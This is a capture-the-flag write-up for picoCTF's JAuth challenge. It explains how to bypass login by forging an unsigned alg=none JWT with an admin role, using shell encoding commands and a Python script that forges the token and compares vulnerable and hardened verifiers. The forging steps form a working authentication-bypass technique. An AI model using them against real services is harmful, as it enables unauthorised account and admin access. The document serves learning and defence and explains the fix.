Description
JAuth stores session state in a JWT cookie. Because the server's verifier honours the alg=none value declared in the token header, you can rewrite the payload to grant yourself admin access and bypass authentication.
Setup
JWT tampering
Visit http://saturn.picoctf.net:52680/ and log in with the provided test/Test123! credentials.
Open DevTools → Application → Cookies to copy the issued JWT. It contains three base64url segments separated by dots.
Solution
- Step 1: Decode the token. Base64url-decode the first two segments. The header uses HS256 and the payload contains role:"user". The third segment is the HMAC signature; you will not need it, because the forged token carries no signature at all.
- Step 2: Forge an unsigned token. Change the header to {"typ":"JWT","alg":"none"} and edit the payload to set "role":"admin". Base64url-encode both segments without padding and concatenate them with a trailing dot to indicate an empty signature. Standard base64 output must be converted to the URL-safe alphabet, and base64 wraps long output at 76 columns, so strip newlines as well as padding:
    printf '{"typ":"JWT","alg":"none"}' | base64 | tr -d '=\n' | tr '+/' '-_'
    printf '{"role":"admin", ...}' | base64 | tr -d '=\n' | tr '+/' '-_'
- Step 3: Swap the cookie. Replace the existing JWT cookie with the forged one (header.payload.) and refresh the page. The admin view appears immediately and prints the flag.
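The three steps above, carried through end to end as an added example that is not part of the original writeup or of the JAuth application. It uses only the Python standard library. The secret, the sample payload and the two verifier functions are constructed for illustration: verify_vulnerable models the behaviour the writeup exploits (an alg=none token with an empty signature is accepted), and verify_hardened shows the fix of pinning the algorithm server-side. The base64url helpers produce exactly the output of the printf | base64 | tr pipeline.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

# Constructed demo secret; the real JAuth signing key is unknown and irrelevant
# to the attack, which never produces a signature at all.
SECRET = b"constructed-demo-secret"


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, as JWT segments require."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Re-add the padding that base64url strips, then decode."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def compact_json(obj: dict) -> bytes:
    """Serialise without whitespace so the encoding matches a hand-typed printf."""
    return json.dumps(obj, separators=(",", ":")).encode()


def decode_segments(token: str) -> Tuple[dict, dict, str]:
    """Step 1: split a JWT into (header, payload, signature) without verifying it."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64)), sig_b64


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Issue a legitimate HS256 token, as the server would at login."""
    header = {"typ": "JWT", "alg": "HS256"}
    signing_input = b64url_encode(compact_json(header)) + "." + b64url_encode(compact_json(payload))
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def forge_none_token(payload: dict) -> str:
    """Step 2: alg=none header, edited payload, trailing dot for the empty signature."""
    header = {"typ": "JWT", "alg": "none"}
    return b64url_encode(compact_json(header)) + "." + b64url_encode(compact_json(payload)) + "."


def _hs256_valid(token: str, sig_b64: str, secret: bytes) -> bool:
    signing_input = token.rsplit(".", 1)[0]
    expected = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def verify_vulnerable(token: str, secret: bytes) -> Optional[dict]:
    """Constructed model of the bug: the verifier obeys whatever alg the header declares."""
    header, payload, sig_b64 = decode_segments(token)
    if header.get("alg") == "none":
        return payload  # unsigned token accepted as-is: this is what step 3 relies on
    if header.get("alg") == "HS256" and _hs256_valid(token, sig_b64, secret):
        return payload
    return None


def verify_hardened(token: str, secret: bytes) -> Optional[dict]:
    """Fix: the accepted algorithm is pinned server-side; the header's alg is not trusted."""
    header, payload, sig_b64 = decode_segments(token)
    if header.get("alg") != "HS256":
        return None  # 'none' and every other algorithm are rejected outright
    if not _hs256_valid(token, sig_b64, secret):
        return None
    return payload


if __name__ == "__main__":
    issued = sign_hs256({"role": "user"}, SECRET)
    print("issued :", issued)
    print("decoded:", decode_segments(issued)[:2])
    forged = forge_none_token({"role": "admin"})
    print("forged :", forged)
    print("vulnerable verifier ->", verify_vulnerable(forged, SECRET))
    print("hardened verifier   ->", verify_hardened(forged, SECRET))
```

Running the script prints the forged token, which begins with the familiar eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0. prefix and ends in a bare dot; the vulnerable verifier returns the admin payload while the hardened one returns None. Note that the hardened verifier rejects based on its own allow-list rather than by blacklisting "none", so case variants such as "None" or "NONE" are refused as well.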
Flag
picoCTF{succ3ss_@u7h3nt1c@710...4eacf}
A verifier that honours alg:"none" from the token header trusts client-supplied data blindly, so editing the payload is enough to escalate privileges. The fix is to pin the accepted algorithm (and key) on the server and reject any token whose header declares something else, rather than letting the token choose how it is verified.